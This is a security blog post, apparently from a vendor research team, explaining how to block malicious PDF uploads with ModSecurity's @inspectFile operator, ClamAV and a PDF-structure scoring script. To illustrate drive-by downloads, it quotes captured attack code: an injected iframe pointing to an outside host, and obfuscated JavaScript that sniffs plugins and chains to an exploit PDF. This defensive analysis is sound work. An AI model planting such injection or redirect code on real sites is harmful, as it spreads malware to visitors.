Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Advanced Topic of the Week: Preventing Malicious PDF File Uploads

Many reports have indicated that malicious PDFs that exploit flaws in Adobe's Acrobat Reader are the top client-side attack vectors. As indicated in many news stories and backed up by the WASC WHID real-time reporting, planting of malware on websites is a major problem for web site owners. The last thing that they want to do is to serve malicious code to their clients. There are many different methods for adding malicious code to web applications including:

Speaking from first hand knowledge gained from monitoring web-based honeypots, I can attest to the drive-by downloading methodology used in a majority of these attacks. They initially inject some small javascript/iframe snippet of code into the application and then they bounce the web web requests around until finally they send the malicious code.

Initial injection into the index.html page:

document.writeln("<iframe  src='http://www.xxxxx9.cn/images/pic/84.htm' width='100' height='0'></iframe>");

This takes you to the 84.htm page which checks the browser's User-Agent string and then redirects the user to the appropriate following page:

<script language="javascript" src="http://count11.51yes.com/click.aspx?id=110639713&logo=12" charset="gb2312"></script> <script> if(isFirefox=navigator.userAgent.indexOf("\x46\x69\x72\x65\x66\x6F\x78")>0) document.write("<iframe src=he.htm width=100 height=0></iframe>"); if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65\x20\x37")==-1) document.write("<iframe width=100 height=0 src=test.htm></iframe>"); gggggg = "<iframe src=02.htm width=100 height=0></iframe>"; if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65\x20\x37")>0) document.write(gggggg); document.write("<iframe src=pp.htm width=100 height=0></iframe>");</script> <script src="http://bgadf.cn/images/css/ads.js"></script> 

This then leads to the pp.htm page which checks for different browser plugins include AcroPDF:

<script> try{var a; var p=new ActiveXObject("AcroPDF.PDF.1");} catch(a){};  finally{if(a!="[object Error]"){document.write("<iframe width=100 height=0 src=p.htm></iframe>");}} try{var b; var ff=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");} catch(b){};  finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=f.htm></iframe>");}} try{var c; var f=new ActiveXObject("OWC10.Spreadsheet");}catch(c){};  finally{if(c!="[object Error]"){aacc = "<iframe src=of.htm width=111 height=111></iframe>" setTimeout("document.write(aacc)", 10000 );}} function Game() { Hdmddd = "IERPCtl.IERPC"+"tl.1"; try { Gime = new ActiveXObject(Hdmddd); }catch(error){return;} Tellm = Gime.PlayerProperty("PRODUCTV"+"ERSION"); if(Tellm<="") document.write("<iframe width=100 height=0 src=r.htm></iframe>"); else document.write("<iframe width=100 height=0 src=r.html></iframe>"); } Game(); </script>

If your browser has the AcroPDF plugin, it will then be sent to the p.htm page which simply includes an iframe to download the final malicious pdf file called "pef.pdf":

<iframe src=pef.pdf width=0 height=0></iframe>

A quick check on the VirusTotal website lists the following data:

AntivirusVersionLast UpdateResult
Sunbelt69902010.10.05Exploit.PDF-JS.Gen (v)

If you had not kept up with your Adobe Acrobat updates, or as it seems more and more frequently, if the badguys have 0-day PDF reader exploits, then your system will get pwned...

File Upload Abuse

While these attack vectors are prevalent, another vector that is often used is to abuse an applications own file upload capability to plant malicious files on the site for other clients to download later. Allowing clients to upload files to your web application can potentially cause big problems however many businesses require this functionality.

If you must allow for file uploads in your web application, I strongly encourage you to review the OWASP Unrestricted File Upload vulnerability page. While it is certainly possible to attack the web application platform itself, the salient point to highlight in this blog post is the following section:

Attacks on other systems

  • Upload .exe file into web tree - victims download trojaned executable
  • Upload virus infected file - victims' machines infected
  • Upload .html file containing script - victim experiences Cross-site Scripting (XSS)

This means that the end goal of the attack is to use the web applications own file upload mechanism in order to spread malicious files to other clients. So, the question them becomes "How can we analyze these file attachments being uploaded in order to prevent any malicious ones from making into our web application?"

Don't be fooled into thinking that this an easily solved question. Many business owners erroneously believe that you can use your standard AV software to scan the file. What they fail to grasp is the fact that AV software typically only scan OS leve files and these file attachments are usually transient in the HTTP transaction. They often traverse reverse proxy servers, load-balancers, etc... until they are finally stored inside a database in a blob format. OS level AV software scanning won't really help in this situation. So how can we do AV scanning of HTTP file attachment uploads?

ModSecurity's @inspectFile operator provides the capability to extract out file attachments so that they can be examined by OS level validation tools. Older versions of ModSecurity also include a perl script called modsec-clamscan.pl that can be used to have clamAV scan the extracted file attachments. Keep in mind that you are not tied to using only clamAV. You can use any script/tool that you want to inspect a file's contents. In this example we are going to show using the @inspectFile operator in action.

In my modsecurity_crs_15_customrules.conf file, I add this example rule -

SecRule FILES_TMPNAMES "@inspectFile base_rules/modsec-clamscan.pl" "phase:2,t:none,log,deny,msg:'Malicous File Attachment Identified.'"

I then need to update the modsec-clamscan.pl file to adjust settings for my local system and call up the clamscan tool. Now, if a user uploads a malicious PDF file, such as the "pef.pdf" example I gathered from the web honeyopts, it can be inspected by our modsec-clamscan.pl script. If we send a fie attachment request with the pef.pdf file to our web server with the new rule, we will get a 403 Forbidden and see the following in the Apache error_log:

[Tue Oct 05 15:10:39 2010] [error] [client] ModSecurity: Access denied with code 403 (phase 2). File "/usr/local/apache/logs/uploads//20101005-151033-TKt4KcCoAWwAAQi@E78AAABA-file-x1hBCw" rejected by the approver script "/usr/local/apache/conf/modsec_current/base_rules/runav.pl": 0 clamscan: Exploit.PDF-72 [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"] [msg "Malicous File Attachment Identified."] [hostname "localhost"] [uri "/cgi-bin/fup.cgi"] [unique_id "TKt4KcCoAWwAAQi@E78AAABA"] 

Identifying Malicious PDFs Through Advanced PDF Structure Analysis

While clamAV is an adequate free open for AV scanning, the old adage holds true: You get what you pay for. PDF exploit development has advanced to such a degree that signature analysis along is not sufficient to identify malicious files. What is needed is a heuristic analysis of the PDF structure to identify malicious characteristics. It just so happens that one of my colleagues here on the Trustwave SpiderLabs Research Team, Rodrigo (@spookerlabs) Montoro has developed a really cool method based on this concept and he will be presenting it at the upcoming Toorcon conference. Check out his blog post that lists some rather surprisingly low detection rates for malicious PDFs from the AV software used with VirtualTotal. He created a script that checks various PDF structures and scores the components. Here is an example of running his script against a malicious PDF that clamAV did not trigger on:

Cross-Table must be bigger than 0 Suspect - Agenda.pdf with  xref 0  xref not equal startxref Suspect - Agenda.pdf with  xref = 0 / startxref = 2  One Page only PDF Suspect - Agenda.pdf with  /Page 1  ObjStm (possible Malware embedded) Detected Suspect - Agenda.pdf with  /ObjStm 5  AcroForm Detected Suspect - Agenda.pdf with  /AcroForm 1  EmbeddedFile Detected Suspect - Agenda.pdf with  /EmbeddedFile 9 
Agenda.pdf Malicious PDF Detected - Score: 16.6

So, if we want to apply this PDF analysis check against our uploaded files, we simply need to update the format of the script output for use with the ModSecurity @inspectFile operator. We need to make sure that the the first character is a "1" if the file is not malicious and a "0" if it is malicious. After plugging in the new script to my SecRule, here is what I get when trying to upload this new malicious PDF that was missed by clamAV:

[Tue Oct 05 16:45:49 2010] [error] [client] ModSecurity: Access denied with code 403 (phase 2). File "/usr/local/apache/logs/uploads//20101005-164547-TKuOe8CoAWwAAQtvFKgAAACA-file-k6mpjv" rejected by the approver script "/usr/local/apache/conf/modsec_current/base_rules/pdf-analyze.pl": 0 pdfscan:  Malicious PDF Detected - Score: 2.6 [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"] [msg "Malicous PDF File Attachment Identified."] [hostname "localhost"] [uri "/cgi-bin/fup.cgi"] [unique_id "TKuOe8CoAWwAAQtvFKgAAACA"]

So as you can see, we can get more accurate results for identifying malicious PDF files uploaded vs. other AV software. OK, now before you ask, access to Rodrigo's PDF analysis script is not ready for public release. It will be released by Trustwave SpiderLabs at some point in the future.

Keep in mind that the @inspectFile operator is simply a type of API that will allow you to inspect file attachments. It is up to you to decide which type of program you would like to plug-in and use.